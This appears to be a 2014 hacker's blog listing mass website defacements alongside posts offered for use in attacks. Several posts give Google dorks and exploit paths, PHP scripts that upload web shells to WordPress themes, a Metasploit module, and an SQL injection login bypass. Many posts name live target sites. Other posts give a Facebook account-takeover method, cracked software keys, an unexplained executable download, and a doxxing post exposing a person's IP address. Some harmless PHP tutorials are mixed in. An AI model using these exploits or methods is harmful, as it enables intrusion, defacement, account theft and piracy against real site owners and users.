Monday, December 29, 2014

0 Card the World

6:18:00 PM Under From Admin
[0 Comment]
Big carding world coming soon...

Before design and scripts are making, 
More time to use for making them. Important time for design. Stay tune and visit my page.

Web URL: http://hck.ru.cx/

Official start working on forum after new year


Happy new year 2015


by Facebook Comment
Read More »

Wednesday, December 10, 2014

0 Massive defaced by KkK1337 December 10, 2014

11:57:00 PM Under From Admin
[0 Comment]

http://barmancity.com/
http://mobile-novinki.ru/
http://qiwi.zfdev.ru/
http://zfdev.ru/

http://avtomonitor.com/
http://nakormim.com/
http://sksaya.kz/
http://mebelka.org/
http://remeshkiapplewatch.ru/
http://converti.ru/
http://fine-cosmetic.ru/
http://lit-ex.ru/
http://nedvizhimost-vsem.ru/
http://novinca.ru/
http://reusablenappies.ru/
http://sallaty.ru/
http://clutchlook.ru/
http://gdevzyatkredit.ru/
http://libido22.ru/
by Facebook Comment
Read More »

0 Counter Strike 1.6 Hide'N'Seek Hack

10:56:00 PM Under From Admin
[0 Comment]
Everyone looking for HNS ( Hide'N'Seek ) Hack

Trawka 2012 Undetected by me :)




Download: http://www.mediafire.com/download/7svrr3o7soubz5f/Trawka+2012+Undetected.rar
by Facebook Comment
Read More »

Monday, December 8, 2014

1 AliExpress WebSite Vulnerability Exposes Millions of Users' Private Information

11:44:00 PM Under From Admin
[1 Comment]
A critical, but easily exploitable personal information disclosure vulnerability has been discovered in the widely popular online marketplace AliExpress website that affects its millions of users worldwide.

The reported vulnerability could allow anyone to steal personal information of hundreds of millions of AliExpress users without knowing their account passwords.

AliExpress is an online marketplace owned by Chinese E-Commerce giant Alibaba.com, which offers more than 300 Million active users from more than 200 countries and regions to order items in bulk or one at a time at low wholesale prices.


According to the Proof-of-Concept video and screenshots provided by the security researcher to The Hacker News, AliExpress website allows logged in user to add/update their shipping address and contact number at the following URL i.e.
http://trade.aliexpress.com/mailingaddress/mailingAddress.htm?mailingAddressId=123456
Where “123456” is the user id of the logged in user. Researcher noticed that just by changing value of “mailingAddressId” parameter to a different value, one could easily exploit the validation flaw of the website to display the Mailing Address and contact information of the respective user on the same webpage, as shown.



A Smart attacker can simply gather personal information of millions of AliExpress users just by using an automated script to crawl “mailingAddress.htm” page for all possible numbers between 1 to 99999999999 as “mailingAddressId” parameter value.

The vulnerability has been reported to AliExpress team and will soon be patched in coming hours, researcher indicated.


by Facebook Comment
Read More »

0 Post "Hacked by" in comment. Guestbook Platform all versions

9:56:00 PM Under From Admin
[0 Comment]
Using Guestbook to post some comments like "Hacked by","Pwned by","Struck by" & ...

Google Dork: "Powered by PHP Guestbook 1.7 from PHP Scripts"

Google Dork: "Powered by PHP guestbook 1.6 from PHPJunkyard - Free PHP scripts"

Google Dork: "View guestbook | Sign guestbook"

Google Dork: "view guestbook" ext:php

Google Dork: inurl:"/guestbook/gbook.php"



When you click on some wanted page just go to "Sign guestbook" and type in Commnets Hacked by %yourname%


How to post comment ->


Successful posted, Go home Guestbook page


Comment: Hacked by KkK1337
Remember always use proxy server admin can locate your Address by clicking on IP image by Facebook Comment
Read More »

Monday, December 1, 2014

0 1 month free and fast VPN

8:25:00 PM Under From Admin
[0 Comment]
Link: http://www.racingvpn.com/buy

Select Test Drive and click continue

Just complete all forms and get it for free 1 month free VPN



by Facebook Comment
Read More »

Thursday, November 27, 2014

0 WordPress db-backup plugin File Download Vulnerability

12:21:00 PM Under From Admin
[0 Comment]
WordPress db-backup plugin File Download Vulnerability


Google Dork: inurl:wp-content/plugins/db-backup/

Exploit path: /wp-content/plugins/db-backup/download.php?file=/etc/passwd

Example: http://www.[target].com/wp-content/plugins/db-backup/download.php?file=/etc/passwd

Live Target: http://www.bagneris.fr/laosi-siglis/wp-content/plugins/db-backup/download.php?file=/etc/passwd

by Facebook Comment
Read More »

Monday, November 24, 2014

1 Upload Button Examples Exploit File Upload

10:19:00 PM Under From Admin
[1 Comment]
Upload Button Examples Exploit File Upload

Google Dork: intitle:"Upload Button Examples"
Google Dork: inurl:"/examples/uploadbutton.html"

Exploit Path: /kindeditor/examples/uploadbutton.html


Click Upload button and Attach your file



Your file will be showed in a blank label
After that you just copy and paste in URL label


If you don't know how to do that you can ask me on my fb fan page :)

https://www.facebook.com/Cracker1337

by Facebook Comment
Read More »

Thursday, November 20, 2014

0 IMCE Mkdir Remote File Upload Vulnerability

10:14:00 AM Under From Admin
[0 Comment]


Google Dork: inurl:"/imce?dir=" intitle:"File Browser
Exploit Example:http://www.[target].com/imce?dir=.

by Facebook Comment
Read More »

Saturday, November 15, 2014

0 LT cms rfu (Fckeditor)

12:43:00 PM Under From Admin
[0 Comment]

Google Dork: Powered By LT


Exploit Path: /admin/fckeditor/editor/filemanager/connectors/uploadtest.html


Exploit Example:


http://www.[target].com/[path]/admin/fckeditor/editor/filemanager/connectors/uploadtest.html


or


http://www.[target].com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html


Access your file:


http://www.[target].com/public_html/userfiles/yourfile.txt


Live Targets:


http://www.qatarcp.com/en/admin/fckeditor/editor/filemanager/connectors/uploadtest.html


http://amtarqatar.com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html



http://merjs-qatar.com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html by Facebook Comment
Read More »

Wednesday, November 12, 2014

1 Hack random Facebook account

12:15:00 AM Under From Admin
[1 Comment]
Tutorial


1.Go to Forgot Password
2.Go to hotmail And SIGN UP
3.Write any email and wait for verify, but no register.
4.Write this email in forgot password
5.And Facebook say this emails is not exist in Facebook.
6.Try,Try,Try, with this method.
7.Try different e-mails but no register.
8.And when you try up to 7-8 you can find any e-mail.
9.And when you write this e-mail in forgot password, facebook show to you name and surname.
10.And you can see, "Send password in My inbox"
11.When you see this , register this email in Hotmail.
12.And click " Send password to my e-mail "
13.And Password and email sended to your e-mail.
14.And Login In facebook with there informations.
! CONGRATULATIONS !
You hacked a one random Facebook Account.
SHARE THIS for help your friends
by Facebook Comment
Read More »

Monday, November 10, 2014

0 conhost executable file

1:20:00 AM Under From Admin
[0 Comment]
http://rghost.net/download/58983956/817a84f2f9e9891c64b8d61f378afd72dba3da05/conhost.exe by Facebook Comment
Read More »

Saturday, November 8, 2014

0 PHP Tutorial Part 3 - IF Statements

11:22:00 AM Under From Admin
[0 Comment]


The Basics Of IF

If statements are used to compare two values and carry out different actions based on the results of the test. If statements take the form IF, THEN, ELSE. Basically the IF part checks for a condition. If it is true, the then statement is executed. If not, the else statement is executed.

IF Strucure

The structure of an IF statement is as follows:

IF (something == something else)
{
THEN Statement
} else {
ELSE Statement
}

Variables

The most common use of an IF statement is to compare a variable to another piece of text, a number, or another variable. For example:

if ($username == "webmaster")

which would compare the contents of the variable to the text string. The THEN section of code will only be executed if the variable is exactly the same as the contents of the quotation marks so if the variable contained 'Webmaster' or 'WEBMASTER' it will be false.

Constructing The THEN Statment

To add to your script, you can now add a THEN statement:

if ($username == "webmaster") {
echo "Please enter your password below";
}

This will only display this text if the username is webmaster. If not, nothing will be displayed. You can actually leave an IF statement like this, as there is no actual requirement to have an ELSE part. This is especially useful if you are using multiple IF statements.

Constructing The ELSE Statement

Adding The ELSE statement is as easy as the THEN statement. Just add some extra code:

if ($username == "webmaster") {
echo "Please enter your password below";
} else {
echo "We are sorry but you are not a recognised user";
}

Of course, you are not limited to just one line of code. You can add any PHP commands in between the curly brackets. You can even include other IF statments (nested statements).

Other Comparisons

There are other ways you can use your IF statement to compare values. Firstly, you can compare two different variables to see if their values match e.g.

if ($enteredpass == $password)

You can also use the standard comparision symbols to check to see if one variable is greater than or less than another:

if ($age < "15")

Or :

if ($date > $finished)

You can also check for multiple tests in one IF statement. For instance, if you have a form and you want to check if any of the fields were left blank you could use:

if ($name == "" || $email == "" || $password == "") {
echo "Please fill in all the fields";
}
by Facebook Comment
Read More »

Tuesday, November 4, 2014

0 PHP Tutorial Part 2 - Displaying Information & Variables

8:13:00 PM Under From Admin
[0 Comment]


Printing Text

To output text in your PHP script is actually very simple. As with most other things in PHP, you can do it in a variety of different ways. The main one you will be using, though, is print. Print will allow you to output text, variables or a combination of the two so that they display on the screen.

The print statement is used in the following way:

print("Hello blog!");

I will explain the above line:

print is the command and tells the script what to do. This is followed by the information to be printed, which is contained in the brackets. Because you are outputting text, the text is also enclosed instide quotation marks. Finally, as with nearly every line in a PHP script, it must end in a semicolon. You would, of course, have to enclose this in your standard PHP tags, making the following code:

<?
print("Hello blog!");
?>

Which will display:

Hello blog!

on the screen.


Variables

As with other programming languages, PHP allows you to define variables. In PHP there are several variable types, but the most common is called a String. It can hold text and numbers. All strings begin with a $ sign. To assign some text to a string you would use the following code:

$welcome_text = "Hello and welcome to my website.";

This is quite a simple line to understand, everything inside the quotation marks will be assigned to the string. You must remember a few rules about strings though:

Strings are case sensetive so $Welcome_Text is not the same as $welcome_text 
String names can contain letters, numbers and underscores but cannot begin with a number or underscore 
When assigning numbers to strings you do not need to include the quotes so:


Outputting Variables

To display a variable on the screen uses exactly the same code as to display text but in a slightly different form. The following code would display your welcome text:

<?
$welcome_text = "Hello and welcome to my website.";
print($welcome_text);
?>



Formatting Your Text

For this example I will change the text to the Arial font in red. The normal code for this would be:

You can change font to wanted. There few fonts: Arial,Courier,Georgia,Times,Tahoma,Verdana

<font face="Arial" color="#FF0000">
</font> 

As you can see this code contains 4 quotation marks so would confuse the script. Because of this you must add a backslash before each quotation mark to make the PHP script ignore it. The code would chang
e to:

<font face=\"Arial\" color=\"#FF0000\">
</font>

You can now include this in your print statement:

print("<font face=\"Arial\" color\"#FF0000\">Hello and welcome to my website.</font>");

which will make the browser display:

Hello and welcome to my website.

because it has only been sent the code:

<font face="Arial" color="#FF0000">Hello and welcome to my website.</font>

This does make it quite difficult to output HTML code into the browser but later in this tutorial I will show you another way of doing this which can make it a bit easier. by Facebook Comment
Read More »

Monday, November 3, 2014

0 PHP Tutorial Part 1 - Introduction

10:29:00 PM Under From Admin
[0 Comment]

What Is PHP?

PHP stands for Hypertext Preprocessor and is a server-side language. This means that the script is run on your web server, not on the user's browser, so you do not need to worry about compatibility issues. PHP is relatively new (compared to languages such as Perl (CGI) and Java) but is quickly becomming one of the most popular scripting languages on the internet.

Declaring PHP

<?
Your code here !
?>

<?php
Your code here !
php?>

<script language="php">
Your code here !
</script>

Your first code:

This is very basic code about information PHP


<?
phpinfo();
?> by Facebook Comment
Read More »

Saturday, November 1, 2014

0 Acunetix Web Vulnerability Scanner 8 Full + Crack + Key

8:55:00 AM Under From Admin
[0 Comment]

Download Link: http://www.mediafire.com/download/ulelz161nonu91f/Acunetix+Web+Vulnerability+Scanner+8+Full+Crack+%2B+Key.zip

1) Download file and unzip on Desktop

2) Install and open

3) Get Activation.exe and wvs.exe from downloaded and move it to acunetix folder.
*If you don't know how see on picture 


4) There is License and all details for Activation.


License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
or
License Key : 5s3b6136t52s56de60d1e76fgd4f7d5h
Name: Hmily/[LCG]
ComPany: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110 - See more at: http://www.h4ck3rcracks.com/2012/08/acunetix-web-vulnerability-scanner-8.html#sthash.NtdlYCdw.dpuf

Download Link: http://www.mediafire.com/download/ulelz161nonu91f/Acunetix+Web+Vulnerability+Scanner+8+Full+Crack+%2B+Key.zip


by Facebook Comment
Read More »

Thursday, October 30, 2014

0 MAARCH 1.4 - SQL Injection / Arbitrary File Upload Vulnerabilities

6:41:00 PM Under From Admin
[0 Comment]

Exploit Title: Maarch 1.4 SQL Injection

Google Dork: intext:"Maarch Maerys Archive v2.1 logo"

Maarch GEC <= 1.4 and Maarch Letterbox <= suffer from multiple sql injection vulnerabilities. The worst is at the login page, index.php :
  
login : superadmin' OR user_id='easy
pass : whatyouwant
  
You see an sql error, but reload the web page, you are logged in.
  
To change superadmin pass:
  
Go to Menu -> Mon Profile
  
Type your news password twice, an email etc, and click on save. New Sql error (history table, so we don't care), but password is changed.
  
Clear your cookies, return to application url, enter your new fresh password, it's done.

Maarch 1.4 Arbitrary file upload

The file "file_to_index.php" is accessible without any authentication to upload a file.
  
This exploit code is a POC for Maarch Letterbox <= 2.4 and Maarch GEC/GED <= 1.4
  

Exploit code : http://pastebin.com/cRdhDh66



by Facebook Comment
Read More »

Wednesday, October 29, 2014

0 Massive defaced by KkK1337 October 29, 2014

10:22:00 PM Under From Admin
[0 Comment]

Server rooted :)

http://yongj.freesa.org/
http://yifa.freesa.org/
http://xyd.freesa.org/
http://wans.freesa.org/
http://pengy.freesa.org/
http://ol.freesa.org/
http://hengymt.freesa.org/
http://fr.freesa.org/ by Facebook Comment
Read More »

1 Operation Greece

4:26:00 PM Under From Admin
[1 Comment]
Operation Greece, Hacked websites with domain .gr

Search more on: https://www.facebook.com/UmbrellaSec


by Facebook Comment
Read More »

Monday, October 27, 2014

0 Joomla Sexy contact form Arbitrary File Upload Vulnerability

11:38:00 PM Under From Admin
[0 Comment]


Google Dork: "/components/com_sexycontactform/" site:gr

Google Dork: "Powered by sexycontact" site:gr

Google Dork: inurl:"sexy-contact-form" site:gr

Exploit : components/com_sexycontactform/fileupload/index.php

Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/shell.php

Source code: http://pastebin.com/J5RmGv2W by Facebook Comment
Read More »

1 Greek "Hacker" Surpised Information leaked

5:19:00 PM Under From Admin
[1 Comment]

A person from Greece named Giwrgos VolcomKid on him facebook is taking a illegal activity on websites. This "Hacker" is know as attacker on websites with "ddos" attack



Attacking on IMVU 

IMVU Facebook: http://www.facebook.com/IMVU
IMVU Official Page: http://www.imvu.com/

Better know this hacker by him nickname "Surpised" he live in country Greece and city Thessaloniki. Because of not good secure we grab him ip address

IP: 176.92.70.193

Surpised is from team "Greek Electronic Army" short "GEA"

Deface page: www.kouskouvelis.gr
All friends is typed in post too :)


by Facebook Comment
Read More »

0 WordPress Magnitudo theme Arbitrary File Upload Vulnerability

3:45:00 PM Under From Admin
[0 Comment]

Google Dork: inurl:wp-content/themes/magnitudo

Use your brain for more dorks :)

Source Code: 
<?php
$uploadfile="shell.php";
$ch = curl_init("http://www.[target].com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell path: http://www.[target].com/wordpress/wp-content/uploads/2014/10/shell.php by Facebook Comment
Read More »

Sunday, October 26, 2014

0 SQL Vulnerable Dorks

7:03:00 PM Under From Admin
[0 Comment]


inurl:.com intext:mysql_fetch_assoc()
inurl:.com intext:mysql_fetch_object()
inurl:.com intext:mysql_numrows()
inurl:.com intext:mysql_fetch_array()
inurl:.com intext:Error Occurred While Processing Request
inurl:.com intext:Server Error in '/' Application
inurl:.com intext:Microsoft OLE DB Provider for ODBC Drivers error
inurl:.com intext:Invalid Querystring
inurl:.com intext:OLE DB Provider for ODBC
inurl:.com intext:VBScript Runtime
inurl:.com intext:ADODB.Field
inurl:.com intext:BOF or EOF
inurl:.com intext:ADODB.Command
inurl:.com intext:JET Database
inurl:.com intext:mysql_fetch_row()
inurl:.com intext:Syntax error
inurl:.com intext:include()
inurl:.com intext:mysql_fetch_assoc()
inurl:.com intext:mysql_fetch_object()
inurl:.com intext:mysql_numrows()
inurl:.com intext:GetArray()
inurl:.com intext:FetchRow() by Facebook Comment
Read More »

Saturday, October 25, 2014

0 CnnCMS 1.x SQL Injection Vulnerability

12:26:00 PM Under From Admin
[0 Comment]

CnnCMS 1.x SQL Injection Vulnerability

Google Dork: inurl:"sub_menu.php?sid="

Open Web : http://www.[target].com/sub_menu.php?sid=-[SQL]

Vuln: You have an error, SQL syntax, MySQL error

Live Targets:
http://lunar.co.id/sub_menu.php?sid=-1
http://www.suwastama.co.id/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1

Admin Page: http://www.[target].com/admin/ by Facebook Comment
Read More »

Friday, October 24, 2014

0 WordPress TrulyMinimal File Upload Vulnerability

10:30:00 AM Under From Admin
[0 Comment]

WordPress TrulyMinimal File Upload Vulnerability

Google Dork: inurl:"/wp-content/themes/trulyminimal"

Exploit : /wp-content/themes/trulyminimal/includes/framework/plugins/uploadify.php

Source code:
<?php
$uploadfile="shell.php";
$ch = curl_init("http://www.[target].com/wp-content/themes/trulyminimal/includes/framework/plugins/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/wp-content/",
'fileext'=>'php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Save as "whatever.html"


Shell Access: http://www.[target].com/wp-content/YourShell.php by Facebook Comment
Read More »

0 China is united for phishing on iCloud & Live.com

9:39:00 AM Under From Admin
[0 Comment]

Chinese assumptions start to block connection for iCloud and login.live.com, instead to this servers they connect to Chinese phishing copy that look identical to the original page. but Google Chrome and Firefox are warning that site is wrong.

All attacks end on Great Firewall assumptions is the attacks are coming from the authorities in China who want to get all information about their people if users are connected to site, attacker or in this situation Chinese assumptions they will get all needed information for access to user profile. 

Users are don't know about attack given that the goal is only one of IP Address of iCloud. You can bypass Great Firewall with help of VPN or proxy server.




by Facebook Comment
Read More »

Thursday, October 23, 2014

0 DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload

1:09:00 PM Under From Admin
[0 Comment]


DotNetNuke DNNspot Store (UploadifyHandler.ashx) 3.0.0 File Upload

Google Dork: inurl:/DesktopModules/DNNspot-Store/

Source code:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store
module versions below 3.0.0.
},
'Author' =>
[
'Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Targets' =>
[
[ 'DNNspot-Store / Windows', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 21 2014'))
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")
})

if res and res.code == 200
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end

def exploit
@payload_name = "#{rand_text_alpha_lower(8)}.aspx"
exe = generate_payload_exe
aspx = Msf::Util::EXE.to_exe_aspx(exe)
post_data = Rex::MIME::Message.new
post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\";
filename=\"#{@payload_name}\"")
post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data;
name=\"folder\"")
post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")
post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
"method" => "POST",
"uri" =>
normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),
"data" => data,
"ctype" => "multipart/form-data; boundary=#{post_data.bound}"
})

unless res and res.code == 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end

register_files_for_cleanup(@payload_name)

print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)
})
end
end



Live target: http://decorseason.com/

Defaced: http://decorseason.com/index.html by Facebook Comment
Read More »